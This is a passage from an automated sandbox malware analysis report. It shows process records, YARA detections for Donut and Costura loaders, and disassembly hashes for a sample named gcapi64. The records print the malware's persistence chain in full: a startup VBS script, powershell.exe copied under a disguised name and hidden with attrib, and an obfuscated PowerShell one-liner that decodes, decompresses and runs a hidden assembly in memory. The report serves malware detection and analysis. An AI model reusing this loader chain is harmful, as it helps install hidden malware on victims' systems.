                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000A.00000002.2944055026.0000016B994F4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000A.00000002.2944055026.0000016B99454000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:false

                                                                General

                                                                Target ID:11
                                                                Start time:05:45:15
                                                                Start date:22/08/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:14
                                                                Start time:05:45:26
                                                                Start date:22/08/2024
                                                                Path:C:\Windows\System32\wscript.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gcapi64.vbs"
                                                                Imagebase:0x7ff7e4bf0000
                                                                File size:170'496 bytes
                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:15
                                                                Start time:05:45:26
                                                                Start date:22/08/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\gcapi64.cmd" "
                                                                Imagebase:0x7ff680870000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:16
                                                                Start time:05:45:26
                                                                Start date:22/08/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:17
                                                                Start time:05:45:26
                                                                Start date:22/08/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo F "
                                                                Imagebase:0x7ff680870000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:18
                                                                Start time:05:45:26
                                                                Start date:22/08/2024
                                                                Path:C:\Windows\System32\xcopy.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj
                                                                Imagebase:0x7ff622d80000
                                                                File size:50'688 bytes
                                                                MD5 hash:39FBFD3AF58238C6F9D4D408C9251FF5
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:19
                                                                Start time:05:45:27
                                                                Start date:22/08/2024
                                                                Path:C:\Windows\System32\attrib.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:attrib +s +h C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj
                                                                Imagebase:0x7ff6eb600000
                                                                File size:23'040 bytes
                                                                MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:20
                                                                Start time:05:45:27
                                                                Start date:22/08/2024
                                                                Path:C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj -WindowStyle hidden -command "$Tcvpdxwib = get-content 'C:\Users\user\AppData\Roaming\gcapi64.cmd' | Select-Object -Last 1; $Eyuktr = [System.Convert]::FromBase64String($Tcvpdxwib);$Qtrqzlhpxt = New-Object System.IO.MemoryStream( , $Eyuktr );$Ibywdtdu = New-Object System.IO.MemoryStream;$Reymjtc = New-Object System.IO.Compression.GzipStream $Qtrqzlhpxt, ([IO.Compression.CompressionMode]::Decompress);$Reymjtc.CopyTo( $Ibywdtdu );$Reymjtc.Close();$Qtrqzlhpxt.Close();[byte[]] $Eyuktr = $Ibywdtdu.ToArray();[Array]::Reverse($Eyuktr); $Xxwiev = [System.Threading.Thread]::GetDomain().Load($Eyuktr); $Krabry = $Xxwiev.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Krabry.DeclaringType, $Krabry.Name).DynamicInvoke() | Out-Null"
                                                                Imagebase:0x7ff6ccc00000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000014.00000002.2328831469.00000183BCCBA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000014.00000002.2107099890.00000183AC193000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000014.00000002.2107099890.00000183ABDA2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 0%, ReversingLabs
                                                                • Detection: 0%, Virustotal, Browse
                                                                Has exited:true

                                                                General

                                                                Target ID:21
                                                                Start time:05:45:40
                                                                Start date:22/08/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                                                                Imagebase:0x7ff70f330000
                                                                File size:41'552 bytes
                                                                MD5 hash:909A1D386235DD5F6BA61B91BA34119D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000002.2426048985.000001C9C5C4D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000002.2524944818.000001C9DE4F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000002.2426048985.000001C9C5CA2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000002.2457809990.000001C9D5C29000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000015.00000002.2410284872.000001C9C3F00000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000002.2457809990.000001C9D6114000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Has exited:true

                                                                General

                                                                Target ID:22
                                                                Start time:05:45:40
                                                                Start date:22/08/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Disassembly

                                                                Reset < >

                                                                  Executed Functions

                                                                  Function 00007FFD9BA01B50 Relevance: 2.3, Instructions: 2270COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0b8ac97f9de55d5d0848e539df12e0d402b3ba2ebffb08db4546f6145af1f261
                                                                  • Instruction ID: aed6c712c983df1838f593630fad0bd80ed5b39ee1a0bcc39f0722d0ed07b59e
                                                                  • Opcode Fuzzy Hash: 0b8ac97f9de55d5d0848e539df12e0d402b3ba2ebffb08db4546f6145af1f261
                                                                  • Instruction Fuzzy Hash: AFF2E730A0974D4FDBA4DF68C4A4BA97BE1FF5A300F1541A9D48DD72A2CA75ED82CB40
                                                                  Function 00007FFD9BA16CAD Relevance: 1.3, Instructions: 1295COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9c86defddf39c520e4b187b3c613e10c3110faf327a10f4fb9ba974551706c6e
                                                                  • Instruction ID: 14f4b3b0483194a8641954a7bc188660de2db5b1e2a41933d278b5b7280da978
                                                                  • Opcode Fuzzy Hash: 9c86defddf39c520e4b187b3c613e10c3110faf327a10f4fb9ba974551706c6e
                                                                  • Instruction Fuzzy Hash: 91824770B09A4E4FE7B99B6C84742B977D2EF94310F15167ED09AC32E2DE68ED428740
                                                                  Function 00007FFD9B7924C9 Relevance: 1.1, Instructions: 1078COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2100797828.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b790000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4ff6484a6a47e7ed08d956ea8fb82c589f7647aab53a6af1967e9aae404a29c6
                                                                  • Instruction ID: 1140be92709e45de79b95f37d5d7ce357b8524b04a7e962f69cea4f0be39b14f
                                                                  • Opcode Fuzzy Hash: 4ff6484a6a47e7ed08d956ea8fb82c589f7647aab53a6af1967e9aae404a29c6
                                                                  • Instruction Fuzzy Hash: 75622B22B0EB8D0FE7AAA7A848655B57BE1EF56210B0902FBD49DC71F3DD18AD05C341
                                                                  Function 00007FFD9BA0F280 Relevance: 3.4, Strings: 2, Instructions: 903COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $
                                                                  • API String ID: 0-227171996
                                                                  • Opcode ID: 9a063e856f43d6ae11d52f54779fd8a7dbe3ad6c97137bbdf35320d8365a11ba
                                                                  • Instruction ID: 9f52648f41287cc4003c81e7db8e14260ca4990d6b6ec938c5830b8cf5a7b7a6
                                                                  • Opcode Fuzzy Hash: 9a063e856f43d6ae11d52f54779fd8a7dbe3ad6c97137bbdf35320d8365a11ba
                                                                  • Instruction Fuzzy Hash: 7352AF3171994D4FEBB4EB6CC4A9A6837D1FF59300F1600BAE48ED72B2CA69ED418741
                                                                  Function 00007FFD9B6CE421 Relevance: 2.6, Strings: 2, Instructions: 143COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: XF5$`F5
                                                                  • API String ID: 0-1353174699
                                                                  • Opcode ID: ac48472df32cf6d9b76807bec6f48596e2e557d34276023176ce0082b36009ac
                                                                  • Instruction ID: 5e99190928e6a0ecb9f7b6a6dd80955d7ffa356792eb1a71b08b9819898d1db3
                                                                  • Opcode Fuzzy Hash: ac48472df32cf6d9b76807bec6f48596e2e557d34276023176ce0082b36009ac
                                                                  • Instruction Fuzzy Hash: 4241A95594E3C55FC323A7B84C749A27FB49E4322871E85EBD0D8CF0E3E508694AC3A2
                                                                  Function 00007FFD9B6CB5F9 Relevance: 2.6, Strings: 2, Instructions: 88COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: F5$ F5
                                                                  • API String ID: 0-3204999982
                                                                  • Opcode ID: 20674bb4e61ceba0944a95d62050ca9cd8e69bffe2515000f9bacac0cedab4ad
                                                                  • Instruction ID: c1a42c128dcfece295768bc100f0b2d0c88a91b64ac4005989ef71ee86f965ac
                                                                  • Opcode Fuzzy Hash: 20674bb4e61ceba0944a95d62050ca9cd8e69bffe2515000f9bacac0cedab4ad
                                                                  • Instruction Fuzzy Hash: 0221E122A0E6CD0FE766BBA858752B83FA19F86220F4E44FBC559CF0E3D85929418311
                                                                  Function 00007FFD9B6C9174 Relevance: 2.6, Strings: 2, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: F5$ F5
                                                                  • API String ID: 0-3204999982
                                                                  • Opcode ID: ce4e0c496e386e411cc51e00622c2833bb8c9d92b47cff167fd707974b178ec7
                                                                  • Instruction ID: 4aabc913d7fd229065896678b0554a3d20900a23a8d1b061782dd19e137a59b4
                                                                  • Opcode Fuzzy Hash: ce4e0c496e386e411cc51e00622c2833bb8c9d92b47cff167fd707974b178ec7
                                                                  • Instruction Fuzzy Hash: 7811E732B0E5494FEB66EA688CB55A537E2DF93314B0600EAC09ACB1E2DD6866428604
                                                                  Function 00007FFD9B6CA9E2 Relevance: 2.6, Strings: 2, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: F5$ F5
                                                                  • API String ID: 0-3204999982
                                                                  • Opcode ID: 90d7b275e78c599541488e7235d631a787aecb9b00689174edc00b64968136fc
                                                                  • Instruction ID: 34bbb73c41bafe1037d38cdef4984385141f2131edbcc215826236d558b3ee97
                                                                  • Opcode Fuzzy Hash: 90d7b275e78c599541488e7235d631a787aecb9b00689174edc00b64968136fc
                                                                  • Instruction Fuzzy Hash: C5118E2160F5CE4FE366B7A844722B47BE19F42220B1A06FBC19DCF1EBD81D75868351
                                                                  Function 00007FFD9BA1CC43 Relevance: 2.5, Strings: 2, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8F5$xF5
                                                                  • API String ID: 0-2983302147
                                                                  • Opcode ID: 586f19d965616fcc99687cd1b3d150b1ec15670e0de10a85b13c4020242415fd
                                                                  • Instruction ID: 5cbbdff88469375f00083dda23501d952192c0c8cd6db522849e9657e3f3a3ef
                                                                  • Opcode Fuzzy Hash: 586f19d965616fcc99687cd1b3d150b1ec15670e0de10a85b13c4020242415fd
                                                                  • Instruction Fuzzy Hash: CC11E570A4E28A5FD759DBA4D4E45A8BBF1DF16310F0405BFD006CB2B2D96C14548700
                                                                  Function 00007FFD9BA0BF20 Relevance: 2.0, Strings: 1, Instructions: 779COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: +[
                                                                  • API String ID: 0-1861804425
                                                                  • Opcode ID: 24cf4cde480f2a4697320be93cc2e8092734b87f050989028d6bb4c3108f391f
                                                                  • Instruction ID: c8d38c3d3baf3af9e0c937f8e032635070ff10ed5ad165e23e360ac5cf24be2a
                                                                  • Opcode Fuzzy Hash: 24cf4cde480f2a4697320be93cc2e8092734b87f050989028d6bb4c3108f391f
                                                                  • Instruction Fuzzy Hash: 1C42A33071994D8FDF98EF68C4A5AA977E1FF59300F1500A9E44DC72A6DE69EC42C780
                                                                  Function 00007FFD9BA0BF61 Relevance: 2.0, Strings: 1, Instructions: 728COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: +[
                                                                  • API String ID: 0-1861804425
                                                                  • Opcode ID: 2ab63e44b1c527b5174b1aaadac7d1854db9a3e4e1c2549765724ce6e38a9ffb
                                                                  • Instruction ID: 7dde04d498e4fa9df0535152bd45ffd1e557149746e1c926e961ebecdc3bfcb5
                                                                  • Opcode Fuzzy Hash: 2ab63e44b1c527b5174b1aaadac7d1854db9a3e4e1c2549765724ce6e38a9ffb
                                                                  • Instruction Fuzzy Hash: 2732A330B1994D8FDBA8EF58C4A5AA977E1FF59300F5500A9E44DC72A2DE79EC42C780
                                                                  Function 00007FFD9BA08EC1 Relevance: 1.9, Strings: 1, Instructions: 614COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: d
                                                                  • API String ID: 0-2564639436
                                                                  • Opcode ID: e48dfe3e885d9b78624e7eabf8007e18572b7ad184fcf1bed6738323e6fe003c
                                                                  • Instruction ID: 751698fbc69ed93a36f17828482413c902235b4da39b9127e878a6f7d9c7baed
                                                                  • Opcode Fuzzy Hash: e48dfe3e885d9b78624e7eabf8007e18572b7ad184fcf1bed6738323e6fe003c
                                                                  • Instruction Fuzzy Hash: FB021130B1DA0A4FD768DF6C88A957173E1EF9A300F1541BED489C72A7DA25EC42C781
                                                                  Function 00007FFD9B79513E Relevance: 1.9, Strings: 1, Instructions: 611COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2100797828.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b790000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @_H
                                                                  • API String ID: 0-518063247
                                                                  • Opcode ID: 4a03debad6cbef28846a679066f3d5edcbcdcb2adfcb21601e557b3b5f0c1a1f
                                                                  • Instruction ID: fe46acb6061fdc5d8b3b6c1eef48ebc92ff5ed0531009b7f3b3867ce142540a8
                                                                  • Opcode Fuzzy Hash: 4a03debad6cbef28846a679066f3d5edcbcdcb2adfcb21601e557b3b5f0c1a1f
                                                                  • Instruction Fuzzy Hash: 7A125171E1AB2E9FEFA4EA98C8A57AD77E2FF68340F110275D00DD31B1DA3469418B50
                                                                  Function 00007FFD9BA002A0 Relevance: 1.6, Strings: 1, Instructions: 305COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: 62bc207f0b851bfdeff42ea7d58958764ce1d06bd9f9bfa92312f1e4cecb8307
                                                                  • Instruction ID: 697205c425c95a3616b7c3c048985e852c8096558b4a85b0158325b84ba856fe
                                                                  • Opcode Fuzzy Hash: 62bc207f0b851bfdeff42ea7d58958764ce1d06bd9f9bfa92312f1e4cecb8307
                                                                  • Instruction Fuzzy Hash: CA91B631F0E64E4FE6B49B98946537977C1EF86310F15027ED4CEC32E1DEA8A9429682
                                                                  Function 00007FFD9B795819 Relevance: 1.6, Strings: 1, Instructions: 305COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2100797828.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b790000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @_H
                                                                  • API String ID: 0-518063247
                                                                  • Opcode ID: 56f8efc5ec35b559b03cd638f8d4bb5aebfca654022e5194d97f04be1b5b38a1
                                                                  • Instruction ID: 8c436912d7a1ad6b092fee397ebeed87bbed48158348a6079a10428bd66c5d6c
                                                                  • Opcode Fuzzy Hash: 56f8efc5ec35b559b03cd638f8d4bb5aebfca654022e5194d97f04be1b5b38a1
                                                                  • Instruction Fuzzy Hash: 5BA18071E0E75D8FEB64EBA884656F87BB2FF59300F11017AD049E71B2DA386941CB50
                                                                  Function 00007FFD9B6C4EDE Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: F5
                                                                  • API String ID: 0-1693313972
                                                                  • Opcode ID: 58850d4e341e4a71c00013819af472ccf70f627360491340de81d7fabd317038
                                                                  • Instruction ID: b485f20f0d41937ebc07cd8d90bab12791f6fc42fd2fdd52861215ba95e16107
                                                                  • Opcode Fuzzy Hash: 58850d4e341e4a71c00013819af472ccf70f627360491340de81d7fabd317038
                                                                  • Instruction Fuzzy Hash: 9351E231A0D7888FD759EFA888A57B97FE0EF56310F0441BFD099CB2A3DA286845C751
                                                                  Function 00007FFD9BA00B30 Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: {
                                                                  • API String ID: 0-1361480709
                                                                  • Opcode ID: a44bc19db6b8b57301c21cd9c444fb9dc9babf3aa66920aad05fb706e2ded93a
                                                                  • Instruction ID: 7a4b42f535a38b450c8cbde83ccb98fbe9d7d78e8deb5485c53ef138d219622a
                                                                  • Opcode Fuzzy Hash: a44bc19db6b8b57301c21cd9c444fb9dc9babf3aa66920aad05fb706e2ded93a
                                                                  • Instruction Fuzzy Hash: 7A41553061DA8D0FF774A7A858696B67BD0EF47324F1506BED4CEC31A2DE59A8428344
                                                                  Function 00007FFD9BA1F040 Relevance: 1.4, Strings: 1, Instructions: 165COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: pF5
                                                                  • API String ID: 0-1751376707
                                                                  • Opcode ID: 4e2a0e9d5b992d3e7cb4dcf10aeca6f941da547fdb99b3b8c65221784c9694a4
                                                                  • Instruction ID: 2a92de7a10081c33a6754fb6f1b732b01756fb00cc870aff1d316b5d7e36387a
                                                                  • Opcode Fuzzy Hash: 4e2a0e9d5b992d3e7cb4dcf10aeca6f941da547fdb99b3b8c65221784c9694a4
                                                                  • Instruction Fuzzy Hash: 74515E30A09A8D8FDF99DF98D864AADBBF1FF59300F1401AED049E7295CB75A841CB40
                                                                  Function 00007FFD9BA00AFD Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: {
                                                                  • API String ID: 0-1361480709
                                                                  • Opcode ID: 1e2eaf154895c37f4b6de054578184165638d2ed4f58e369d0c8d37729b9e97e
                                                                  • Instruction ID: d2389390ed51974111739442560d745392c6157ff7bb9219d2b8ddd60b90186e
                                                                  • Opcode Fuzzy Hash: 1e2eaf154895c37f4b6de054578184165638d2ed4f58e369d0c8d37729b9e97e
                                                                  • Instruction Fuzzy Hash: 5241232061EACE1FE766A7B848745B63FE0DF47224F1905FAD4C9C71A3DD58A806C345
                                                                  Function 00007FFD9B6CBF24 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: SF
                                                                  • API String ID: 0-3927473838
                                                                  • Opcode ID: 8fed4e863171ff42cf31ea267cd1cdf9037bbe320d68d6c4d28ddff67da73a40
                                                                  • Instruction ID: e22c8c15ba25f085c00e107bf96590f2078206ec7766858e290f890f515b81e0
                                                                  • Opcode Fuzzy Hash: 8fed4e863171ff42cf31ea267cd1cdf9037bbe320d68d6c4d28ddff67da73a40
                                                                  • Instruction Fuzzy Hash: 0631F721B0E6894FE796B7BC54695B43BE1EF8B21070A01F6D558CF2B3ED18AD028751
